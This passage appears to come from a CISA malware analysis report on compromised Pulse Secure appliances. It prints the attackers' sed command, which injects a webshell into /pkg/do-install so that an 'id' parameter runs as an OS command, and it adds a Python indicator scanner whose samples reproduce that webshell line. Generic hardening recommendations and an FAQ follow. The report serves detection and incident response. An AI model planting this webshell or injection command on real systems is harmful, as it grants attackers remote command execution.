system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
—End Malicious Patched In Code—

The patched-in code runs the following sed command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:

--Begin Malicious SED Command--
"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from an incoming web application POST request. The webshell then executes the data provided in the "id" parameter as an operating system command via the system() function.
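The patched lines quoted across the findings above (the "id"-to-system() one-liner in compcheckjava.cgi and meeting_testjs.cgi, the serverid token in licenseserverproto.cgi, the ##cgistart/##start_total markers and remount in DSUpgrade.pm, the RC4 wrapper in healthcheck.cgi, and the sed loop in clear_log.sh) are stable enough to triage a device image with. The scanner below is an added example, not CISA's tooling; it assumes it is pointed at an extracted Pulse Secure file system image (so paths such as home/webserver/htdocs/dana-na/ and home/perl/ sit under the root you pass), and the sample files it scans by default are constructed here.

```python
import re
import sys
from pathlib import Path

# Indicators lifted from the patched code quoted in this report. Each is a
# (label, regex) pair matched line by line against Perl/CGI/shell files.
INDICATORS = [
    # compcheckjava.cgi / meeting_testjs.cgi: 'id' parameter straight into system()
    ("param-id-to-system", re.compile(r'CGI::param\("id"\).*system\("\$na"\)')),
    # licenseserverproto.cgi: hard-coded 'serverid' token, then system $cmd
    ("serverid-token", re.compile(r"csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa")),
    ("query-string-exec", re.compile(r"\bsystem \$cmd\b")),
    # DSUpgrade.pm: region markers consumed by the sed-based patching routine
    ("patch-markers", re.compile(
        r"##(?:cgistart[12]|cgiend[12]|scriptstart|scriptend|start_total|end_total|perlstart|perlend)")),
    ("remount-rw", re.compile(r"mount -o remount,rw /dev/root /")),
    ("do-install-sed", re.compile(r"/echo_console .*Saving package.*/pkg/do-install")),
    # healthcheck.cgi: RC4 keyed with the 6-byte prefix plus $ph
    ("rc4-webshell", re.compile(r"RC4\(\s*\$k\.\$ph")),
    # clear_log.sh: in-place sed over the NUL-delimited Pulse Secure logs
    ("log-wiper", re.compile(r"sed -i .*x00.*/data/runtime/logs/")),
]


def scan_text(name, text):
    """Return (name, line number, indicator label) for every matching line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((name, lineno, label))
    return hits


def scan_tree(root, suffixes=(".cgi", ".pm", ".sh")):
    """Walk an extracted file system image and scan every Perl/CGI/shell file."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            hits.extend(scan_text(str(path), path.read_text(errors="replace")))
    return hits


# Constructed samples mimicking the patched lines quoted in the report, plus
# one clean CGI file to show the scanner stays quiet on it.
SAMPLES = {
    "dana-na/auth/compcheckjava.cgi": (
        "use CGI;\n"
        'if(CGI::param("id")){print "Cache-Control: no-cache\\n";'
        'my $na=CGI::param("id");system("$na");}else{&main();}\n'
    ),
    "dana-na/licenseserver/licenseserverproto.cgi": (
        "sub main {\n"
        '   my $psalLaunch = CGI::param("serverid");\n'
        "   if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)\n"
        "   { system $cmd; }\n"
        "}\n"
    ),
    "perl/DSUpgrade.pm": (
        "sub installPackage {\n"
        "##start_total\n"
        'system("/bin/mount -o remount,rw /dev/root /");\n'
        "}\n"
    ),
    "dana-na/meeting/clean.cgi": (
        "use CGI;\nmy $q = CGI->new;\nprint $q->header;\n&main();\n"
    ),
}


def scan_samples():
    """Run the indicators over the constructed samples."""
    hits = []
    for name, text in SAMPLES.items():
        hits.extend(scan_text(name, text))
    return hits


if __name__ == "__main__":
    # Usage: python scan.py /path/to/extracted/image  (no argument: scan samples)
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else scan_samples()
    for name, lineno, label in results:
        print(f"{name}:{lineno}: {label}")
```

A hit is a triage lead, not a verdict: compare the flagged file against the same path in a known-good package of the installed version before acting on it.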

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version
